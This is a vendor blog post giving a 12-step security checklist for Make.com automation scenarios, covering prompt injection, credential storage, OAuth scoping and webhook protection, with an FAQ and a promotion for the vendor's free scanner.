MAKE.COM SECURITY
Make.com Automation Security Checklist
12 steps to secure your Make.com scenarios against prompt injection, credential theft, and data exfiltration.
Published April 21, 2026 · 6 min read · By Scannly
DIRECT ANSWER
The Make.com automation security checklist covers 12 controls: inventory all scenarios, add input validation before AI modules, store credentials in Connection Manager, scope OAuth permissions, secure webhooks, validate AI output, apply least-privilege, enable error notifications, review execution history, rotate credentials quarterly, document scenarios, and run a security scan. Complete all 12 every quarter to maintain a secure Make.com workspace.
The 12-Step Checklist
01
Inventory all active scenarios
List every active Make.com scenario in your workspace. You cannot secure what you have not mapped. Note which ones contain AI modules, webhook triggers, or connections to sensitive data sources.
02
Add input validation before every AI module
Insert a Filter or Router module before every AI module. Check that inputs do not contain instruction-like patterns. Only pass the specific field the AI needs — not the entire payload.
03
Store all credentials in Connection Manager
Never paste API keys into module fields. Every credential must be stored in Make's Connection Manager. Keys in module fields appear in execution logs in plain text.
04
Scope OAuth permissions to minimum required
When creating connections, choose the most restrictive scope available. Review each connection monthly and reconnect with tighter permissions if broader access was granted during initial setup.
05
Secure all webhook triggers
Add header-based authentication to every public-facing webhook. Validate the payload structure before processing. Use Make's built-in webhook validation where available.
06
Validate AI module output before actions
Add a filter between your AI module and any send, write, or notify action. Check the output for unexpected email addresses, external URLs, or data not present in the original input.
07
Apply least-privilege to all connections
Audit every connection in your workspace. Revoke access to apps that your scenarios no longer actively use. Use separate connections per scenario where possible.
08
Enable scenario error notifications
Turn on email alerts for scenario errors in Make's notification settings. A failed scenario may indicate an attack or unexpected input — you need to know immediately.
09
Review execution history monthly
Check the execution history of every AI scenario monthly. Look for unexpected data, unusual run times, or operations that were not intended by the scenario design.
10
Rotate credentials quarterly
Any API key or access token in use for more than 90 days should be rotated. Update the credential in Make's Connection Manager and revoke the old key from the API provider.
11
Document your scenarios
Maintain a simple record of what each scenario does, what data it processes, and what permissions it uses. This makes security audits faster and incident response possible.
12
Run a security scan
Use Scannly's free Risk Scanner to get an automated assessment of your Make.com scenarios. It checks all the above controls and returns a scored report in 60 seconds.
Scan Your Make.com Scenarios Free
Scannly checks all 12 controls automatically and returns a scored security report in 60 seconds. No account required.
Run My Free Scan →Frequently Asked Questions
How do I secure a Make.com scenario with AI modules?
Add a filter or router step before every AI module to validate and sanitise inputs. Store all API keys in Make's Connection Manager. Restrict OAuth permissions to the minimum required. Add error alerting and review scenario execution history monthly.
Does Make.com have built-in security for AI modules?
Make.com has no built-in AI input validation or prompt injection protection. You must implement these controls yourself using filter modules, router branches, and custom validation steps before any AI module in your scenario.
What is the biggest Make.com security risk?
Passing raw webhook payload data or user-controlled content directly into an AI module without validation. This is the most common vulnerability in Make.com AI scenarios and the easiest to fix.
How often should I audit my Make.com scenarios?
Run a full security audit quarterly. Review active connections and their permission scopes monthly. Any time you add a new module, integration, or AI step is also a good trigger for a quick security check.